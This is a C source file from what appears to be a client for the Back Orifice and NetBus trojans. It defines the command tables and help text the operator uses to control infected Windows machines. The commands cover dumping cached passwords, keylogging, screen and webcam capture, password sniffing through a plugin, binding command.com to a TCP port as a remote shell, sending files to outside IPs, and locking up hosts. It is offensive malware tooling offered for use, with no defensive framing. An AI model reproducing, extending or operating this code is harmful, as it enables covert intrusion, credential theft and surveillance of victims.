
#include "bounix.h"
#include <ctype.h>
#include <stdio.h>
#ifdef HAVE_STRINGS_H
#include <strings.h>
#endif



struct COMMAND bo_cmds[] =
{
	{
		"mode",
		"Switches the trojan mode to use.\n\
Usage:\n\
	MODE mode\n\
Example:\n\
	mode netbus\n\
	mode back\n\
	mode bo",
		CMD_BO_BASIC,
		cmd_mode
	},
	{
		"quit",
		"Exits the Back Orifice client.\n\
Usage:\n\
	QUIT",
		CMD_BO_BASIC,
		cmd_quit
	},
	{
		"help",
		"Gives short command description, or general help if no parameters.\n\
Usage:\n\
	HELP [command]\n\
Example:\n\
	help\n\
	help help",
		CMD_BO_BASIC,
		cmd_help
	},
	{
		"host",
		"Set the target host and port.\n\
Usage:\n\
	HOST ip [port]\n\
Example:\n\
	host 198.137.241.30 31337",
		CMD_BO_BASIC,
		cmd_bo_host
	},
	{
		"server",
		"Alias for `host'. Try `help host'.",
		CMD_BO_BASIC,
		cmd_bo_host
	},
	{
		"ping",
		"Pings the current host.\n\
Usage:\n\
	PING",
		CMD_BO_BASIC,
		cmd_bo_ping
	},
	{
		"pinglist",
		"Pings a list of IP addresses in a text file.\n\
Usage:\n\
	PINGLIST localfilename
		Example:\n \
		pinglist c:\\bo\\bohosts",
		CMD_BO_BASIC,
		cmd_bo_pinglist
	},
	{
		"status",
		"Displays current software status.\n\
Usage:\n\
	STATUS",
		CMD_BO_BASIC,
		cmd_bo_status
	},
	{
		"dir",
		"Display remote files with wildcards.\n\
Usage:\n\
	DIR [filespec]\n\
Example:\n\
	dir c:\\windows\\*.pwl\n\
Note:\n\
	If no filespec is provided, a list of the current remode dir is displayed.",
		CMD_BO_FILE,
		cmd_bo_dir
	},
	{
		"cd",
		"Changes current host directory.\n\
Usage:\n\
	CD newdirectory\n\
Example:
	cd d:\\david\\p0rn0\\movies",
		CMD_BO_DIR,
		cmd_bo_cd
	},
	{
		"del",
		"Deletes a file.\n\
Usage:\n\
	DEL filename\n\
Example:
	del c:\\windows\\netwatch.exe",
		CMD_BO_FILE,
		cmd_bo_del
	},
	{
		"copy",
		"Copies a file.\n\
Usage:\n\
	COPY sourcefilename targetfilename\n\
Example:\n\
	copy c:\\windows\\system\\bo.exe \\\\server\\c\\windows\\startm~1\\programs\\startup",
		CMD_BO_FILE,
		cmd_bo_copy
	},
	{
		"find",
		"Searches a directory tree for a filespec.\n\
Usage:\n\
	FIND filespec root\n\
Example:\n\
	find *.avi c:\\",
		CMD_BO_FILE,
		cmd_bo_find
	},
	{
		"freeze",
		"Compresses a file.\n\
Usage:\n\
	FREEZE sourcefilename targetfilename\n\
Example:\n\
	freeze c:\\windows\\temp\\cap.bmp c:\\windows\\temp\\c",
		CMD_BO_FILE,
		cmd_bo_freeze
	},
	{
		"melt",
		"Decompresses a file.\n\
Usage:\n\
	MELT sourcefilename targetfilename\n\
Example:\n\
	melt c:\\windows\\temp\\t c:\\windows\\desktop.bmp",
		CMD_BO_FILE,
		cmd_bo_melt
	},
	{
		"view",
		"Views a file.\n\
Usage:\n\
	VIEW filename\n\
Example:\n\
	view c:\\windows\\system.ini",
		CMD_BO_FILE,
		cmd_bo_view
	},
	{
		"md",
		"Makes a directory.\n\
Usage:\n\
	MD directoryname\n\
Example:\n\
	md c:\\windows\\temp\\t",
		CMD_BO_DIR,
		cmd_bo_md
	},
	{
		"rd",
		"Removes a directory.\n\
Usage:\n\
	RD directoryname\n\
Example:\n\
	rd c:\\windows\\fonts",
		CMD_BO_DIR,
		cmd_bo_rd
	},
	{
		"info",
		"Displays remote system info.\n\
Usage:\n\
	INFO",
		CMD_BO_SYS,
		cmd_bo_info
	},
	{
		"passes",
		"Displays remote cached passwords.\n\
Usage:\n\
	PASSES",
		CMD_BO_SYS,
		cmd_bo_passes
	},
	{
		"dialog",
		"Displays a dialog box.\n\
Usage:\n\
	DIALOG text title\n\
Example:\n\
	dialog \"Get back to work, you lazy bum!\" \"A message from the management:\"",
		CMD_BO_SYS,
		cmd_bo_dialog
	},
	{
		"netview",
		"Displays resources available on the network.\n\
Usage:\n\
	NETVIEW",
		CMD_BO_NET,
		cmd_bo_netview
	},
	{
		"netconnect",
		"Connects to a network resource.\n\
Usage:\n\
	NETCONNECT netresource password\n\
Example:\n\
	netconnect \\server\\admin$ s3cur3",
		CMD_BO_NET,
		cmd_bo_netconnect
	},
	{
		"netdisconnect",
		"Disconnects from a network resource.\n\
Usage:\n\
	NETDISCONNECT netresource\n\
Example:
	netdisconnect \\server\\admin$",
		CMD_BO_NET,
		cmd_bo_netdisconnect
	},
	{
		"proclist",
		"Lists the running processes.\n\
Usage:\n\
	PROCLIST",
		CMD_BO_PROCESS,
		cmd_bo_proclist
	},
	{
		"prockill",
		"Kills a running process.\n\
Usage:\n\
	PROCKILL process_ID\n\
Example:\n\
	prockill 4294651219\n\
Note:\n\
	Process IDs are listed by `proclist'.",
		CMD_BO_PROCESS,
		cmd_bo_prockill
	},
	{
		"procspawn",
		"Spawns a process.\n\
Usage:\n\
	PROCSPAWN program program_parameters\n\
Example:\n\
	procspawn command.com /C netstat -na > c:\\windows\\temp\\t",
		CMD_BO_PROCESS,
		cmd_bo_procspawn
	},
	{
		"passwd",
		"Sets the encryption password for client.\n\
Usage:\n\
	PASSWD netpassword\n\
Example:\n\
	passwd k1ll-m3",
		CMD_BO_BASIC,
		cmd_bo_procspawn
	},
	{
		"ren",
		"Renames a file or directory.\n\
Usage:\n\
	REN oldfilename newfilename\n\
Example:\n\
	ren c:\\windows\\fonts c:\\windows\\f",
		CMD_BO_FILE,
		cmd_bo_ren
	},
	{
		"resolve",
		"Resloves the IP of a hostname from the remote host.\n\
Usage:\n\
	RESLOVE hostname\n\
Example:\n\
	resolve server2",
		CMD_BO_NET,
		cmd_bo_resolve
	},
	{
		"sharelist",
		"Lists exports.\n\
Usage:\n\
	SHARELIST",
		CMD_BO_NET,
		cmd_bo_sharelist
	},
	{
		"shareadd",
		"Adds an export.\n\
Usage:\n\
	SHAREADD sharename localdirectory,password,remark\n\
Example:\n\
	shareadd tmp$ \"c:\\,system49,System share\"",
		CMD_BO_NET,
		cmd_bo_shareadd
	},
	{
		"sharedel",
		"Deletes an export.\n\
Usage:\n\
	SHAREDEL sharename\n\
Example:\n\
	sharedel drvc",
		CMD_BO_NET,
		cmd_bo_sharedel
	},
	{
		"keylog",
		"Logs keystrokes to file.\n\
Usage:\n\
	KEYLOG filename\n\
Example:\n\
	keylog c:\\windows\\temp\\t\\l\n\
Note:\n\
	Use `keylog stop' to end keyboard logging.",
		CMD_BO_NET,
		cmd_bo_keylog
	},
	{
		"regmakekey",
		"Creates a key in the registry.\n\
Usage:\n\
	REGMAKEKEY keyname\n\
Example:\n\
	regmakekey HKEY_LOCAL_MACHINE\\SOFTWARE\\MyWare",
		CMD_BO_REG,
		cmd_bo_regmakekey
	},
	{
		"regdelkey",
		"Deletes a key from the registry.\n\
Usage:\n\
	REGDELKEY keyname\n\
Example:
	regdelkey HKEY_LOCAL_MACHINE\\SOFTWARE\\MyWare",
		CMD_BO_REG,
		cmd_bo_regdelkey
	},
	{
		"regdelval",
		"Deletes a value from a key.\n\
Usage:\n\
	REGDELVAL valuename\n\
Example:\n\
	regdelval HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CurrentVersion\\Run\\netwatcher",
		CMD_BO_REG,
		cmd_bo_regdelval
	},
	{
		"reglistkeys",
		"List the subkeys of a registry key.\n\
Usage:\n\
	REGLISTKEYS keyname\n\
Example:\n\
	reglistkeys HKEY_LOCAL_MACHINE\\SOFTWARE",
		CMD_BO_REG,
		cmd_bo_reglistkeys
	},
	{
		"reglistvals",
		"Lists the values of a key.\n\
Usage:\n\
	REGLISTVALS keyname\n\
Example:\n\
	reglistvals HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CurrentVersion\\Network",
		CMD_BO_REG,
		cmd_bo_reglistvals
	},
	{
		"regsetval",
		"Sets the value of a key, creating it if it did not already exist.\n\
Usage:\n\
	REGSETVAL valuename type,value\n\
Example:\n\
	regsetval HKEY_LOCAL_MACHINE\\SOFTWARE\\BinaryValue B,08090A0B0C0D0E0F10\n\
	regsetval HKEY_LOCAL_MACHINE\\SOFTWARE\\DwordValue D,54321\n\
	regsetval HKEY_LOCAL_MACHINE\\SOFTWARE\\StringValue \"S,This is a string value\"\n\
Note:\n\
	Binary values (type B) are specified in two digit hex values, dword values (type D) in decimal.",
		CMD_BO_REG,
		cmd_bo_regsetval
	},
	{
		"listcaps",
		"Lists the video capture devices.\n\
Usage:\n\
	LISTCAPS",
		CMD_BO_MM,
		cmd_bo_listcaps
	},
	{
		"capframe",
		"Captures a frame from a video capture device.\n\
Usage:\n\
	CAPFRAME bitmapfilename device,width,height,bitplanes\n\
Example:\n\
	capframe c:\\windows\\temp\\cap.bmp 0,320,200,16\n\
Note:\n\
	If all or part of device info is not provided, default is 0,640,480,16.",
		CMD_BO_MM,
		cmd_bo_capframe
	},
	{
		"capavi",
		"Captures video from a video capture device to an AVI.\n\
Usage:\n\
	CAPAVI bitmapfilename seconds, device, width, height, bitplanes\n\
Example:\n\
	capavi c:\\windows\\desktop\\you.avi 10,0,320,200,16\n\
Note:\n\
	If all or part of the device info is not provided, default is 0,320,240,16.",
		CMD_BO_MM,
		cmd_bo_capavi
	},
	{
		"capscreen",
		"Captures an image of the current screen to a bitmap\n\
Usage:\n\
	CAPSCREEN bitmapfilename\n\
Example:\n\
	capscreen c:\\windows\\temp\\c.bmp",
		CMD_BO_MM,
		cmd_bo_capscreen
	},
	{
		"sound",
		"Plays a WAV file.\n\
Usage:\n\
	SOUND wavfilename\n\
Example:\n\
	sound c:\\windows\\youare0wned.wav",
		CMD_BO_MM,
		cmd_bo_sound
	},
	{
		"redirlist",
		"Lists the current port redirections.\n\
Usage:\n\
	REDIRDEL",
		CMD_BO_REDIR,
		cmd_bo_redirlist
	},
	{
		"rediradd",
		"Adds a port redirection.\n\
Usage:\n\
	REDIRADD inputport outputIP:port[,UDP]\n\
Example:\n\
	rediradd 33331 205.183.56.7:31337,U\n\
	rediradd 1001 207.213.15.11:23\n\
Note:\n\
	If no output port is provided, the input port is used.",
		CMD_BO_REDIR,
		cmd_bo_rediradd
	},
	{
		"redirdel",
		"Deletes a port redirection.\n\
Usage:\n\
	REDIRDEL redir_number\n\
Example:\n\
	redirdel 0",
		CMD_BO_REDIR,
		cmd_bo_redirdel
	},
	{
		"applist",
		"Lists listening console applications.\n\
Usage:\n\
	APPLIST",
		CMD_BO_CON,
		cmd_bo_applist
	},
	{
		"appadd",
		"Spawns a console application on a TCP port.\n\
Usage:\n\
	APPADD \"program program_params\" port\n\
Example:\n\
	appadd command.com 23\n\
	appadd \"netstat -na\" 998",
		CMD_BO_CON,
		cmd_bo_appadd
	},
	{
		"appdel",
		"Removes a console application from the redirected console apps.\n\
Usage:\n\
	APPDEL app_id\n\
Example:
	appdel 0",
		CMD_BO_CON,
		cmd_bo_appdel
	},
	{
		"httpon",
		"Enables the HTTP server.\n\
Usage:\n\
	HTTPON port [root]\n\
Example:\n\
	httpon 80 c:\\www\n\
	httpon 9999",
		CMD_BO_SYS,
		cmd_bo_httpon
	},
	{
		"httpoff",
		"Disables the HTTP server.\n\
Usage:\n\
	HTTPOFF",
		CMD_BO_SYS,
		cmd_bo_httpoff
	},
	{
		"sweep",
		"Sweeps a subnet with ping packets.\n\
Usage:\n\
	SWEEP ip\n\
Example:\n\
	sweep 207.114.140",
		CMD_BO_BASIC,
		cmd_bo_sweep
	},
	{
		"sweeplist",
		"Sweeps a list of subnets in a text file.\n\
Usage:\n\
	SWEEPLIST localfilename\n\
Example:
	sweeplist c:\\bo\\dialups",
		CMD_BO_BASIC,
		cmd_bo_sweeplist
	},
	{
		"reboot",
		"Reboots the remote host.\n\
Usage:\n\
	REBOOT",
		CMD_BO_SYS,
		cmd_bo_reboot
	},
	{
		"lockup",
		"Locks up the remote host.\n\
Usage:\n\
	LOCKUP",
		CMD_BO_SYS,
		cmd_bo_lockup
	},
	{
		"tcpsend",
		"Connects the server to an IP and sends a file.\n\
Usage:\n\
	TCPSEND filename target_IP:port\n\
Example:\n\
	tcpsend c:\\file 206.165.128.130:999",
		CMD_BO_NET,
		cmd_bo_tcpsend
	},
	{
		"tcprecv",
		"Connects a server to an IP and receives a file.\n\
Usage:\n\
	TCPRECV filename target_IP:port\n\
Example:\n\
	tcprecv c:\\file 206.165.128.130:999",
		CMD_BO_NET,
		cmd_bo_tcprecv
	},
	{
		"pluginlist",
		"Lists active plugins.\n\
Usage:\n\
	PLUGINLIST",
		CMD_BO_PLUGIN,
		cmd_bo_pluginlist
	},
	{
		"pluginexec",
		"Executes a plugin.\n\
Usage:\n\
	PLUGINEXEC DLL_name:plugin_name params\n\
Example:\n\
	pluginexec bos:_SniffPasses 0001 c:\\sniff.log",
		CMD_BO_PLUGIN,
		cmd_bo_pluginexec
	},
	{
		"pluginkill",
		"Tells a plugin to terminate.\n\
Usage:\n\
	PLUGINKILL plugin_ID\n\
Example:\n\
	pluginkill 0",
		CMD_BO_PLUGIN,
		cmd_bo_pluginkill
	},
	{
		(char *) NULL,
		(char *) NULL,
		CMD_NONE,
		NULL
	}
};


struct COMMAND nb_cmds[] =
{
	{
		"mode",
		"Switches the trojan mode to use.\n\
Usage:\n\
	MODE mode\n\
Example:\n\
	mode netbus\n\
	mode backor\n\
	mode bo",
		CMD_NB_BASIC,
		cmd_mode
	},
	{
		"quit",
		"Exits the NetBus client.\n\
Usage:\n\
	QUIT",
		CMD_NB_BASIC,
		cmd_quit
	},
	{
		"help",
		"Gives short command description, or general help if no parameters.\n\
Usage:\n\
	HELP [command]\n\
Example:\n\
	help\n\
	help help",
		CMD_NB_BASIC,
		cmd_help
	},
	{
		"host",
		"Set the target host and port.\n\
Usage:\n\
	HOST ip [port]\n\
Example:\n\
	host 198.137.241.30 12345",
		CMD_NB_BASIC,
		cmd_nb_host
	},
	{
		"server",
		"Alias for `host'. Try `help host'.",
		CMD_NB_BASIC,
		cmd_nb_host
	},
	{
		"close",
		"Closes the connection with remote host.\n\
Usage:\n\
	CLOSE",
		CMD_NB_NET,
		cmd_nb_close
	},
	{
		"info",
		"Gets info about remote host.\n\
Usage:\n\
	INFO",
		CMD_NB_SYS,
		cmd_nb_info
	},
	{
		"listen",
		"Listen for keys pressed on remote host.\n\
Usage:\n\
	LISTEN ON|OFF\n\
Example:\n\
	listen on",
		CMD_NB_SYS,
		cmd_nb_listen
	},
	{
		"cdeject",
		"Ejects remote CD-ROM.\n\
Usage:\n\
	CDEJECT",
		CMD_NB_MM,
		cmd_nb_cdeject
	},
	{
		"cdclose",
		"Closes remote CD-ROM.\n\
Usage:\n\
	CDCLOSE",
		CMD_NB_MM,
		cmd_nb_cdclose
	},
	{
		"send",
		"Sends raw NetBus command supplied as first argument.\n\
Usage:\n\
	SEND command\n\
Example:\n\
	send Eject;1;\n\
	send GetInfo;\n\
	send URL;http://www.microsoft.com;",
		CMD_NB_BASIC,
		cmd_nb_send
	},
	{
		"keys",
		"Disables/enables keys on remote keyboard.\n\
Usage:\n\
	KEYS ON|OFF keys\n\
Example:\n\
	keys off abcd\n\
	keys on\n\
Note:\n\
	`keys on' always enables ALL disabled keys.",
		CMD_NB_SYS,
		cmd_nb_keys
	},
	{
		"swapbuttons",
		"Swaps/unswaps remote mouse buttons.\n\
Usage:\n\
	SWAPBUTTONS [ON|OFF]\n\
Example:\n\
	swapbuttons on",
		CMD_NB_SYS,
		cmd_nb_swapbuttons
	},
	{
		"startapp",
		"Starts an application on remote host.\n\
Usage:\n\
	STARTAPP appname\n\
Example:\n\
	startapp c:\\windows\\calc.exe",
		CMD_NB_SYS,
		cmd_nb_startapp
	},
	{
		"url",
		"Launches default browser on remote host and points it to an URL.\n\
Usage:\n\
	URL url\n\
Example:\n\
	url www.microsoft.com",
		CMD_NB_SYS,
		cmd_nb_url
	},
	{
		(char *) NULL,
		(char *) NULL,
		CMD_NONE,
		NULL
	}
};




struct COMMAND *get_commands(void)
{
	if (trojanmode == TROJAN_BO)
		return (struct COMMAND *) bo_cmds;
	if (trojanmode == TROJAN_NB)
		return (struct COMMAND *) nb_cmds;
	return (struct COMMAND *) NULL;
}


void givehelpcommand(char *arg1)
{
	struct COMMAND *cmds, *cmd;
	int i, ambig;

	cmd = (struct COMMAND *) NULL;
	ambig = 0;
	cmds = get_commands();
	if (cmds == (struct COMMAND *) NULL)
		return;
	for (i = 0; cmds[i].cmd != (char *) NULL; i++) {
		if (strncasecmp(arg1, cmds[i].cmd, strlen(arg1)) == 0) {
			if (cmd == (struct COMMAND *) NULL)
				cmd = &cmds[i];
			else {
				ambig = 1;
				break;
			}
		}
	}
	if (ambig != 0) {
		printf("help: Ambigous command: `%s'!\n", arg1);
	} else {
		if (!cmd)
			printf("help: No help for `%s'\n", arg1);
		else
			printf("\n%s: %s\n", cmd->cmd, cmd->help);
	}
}

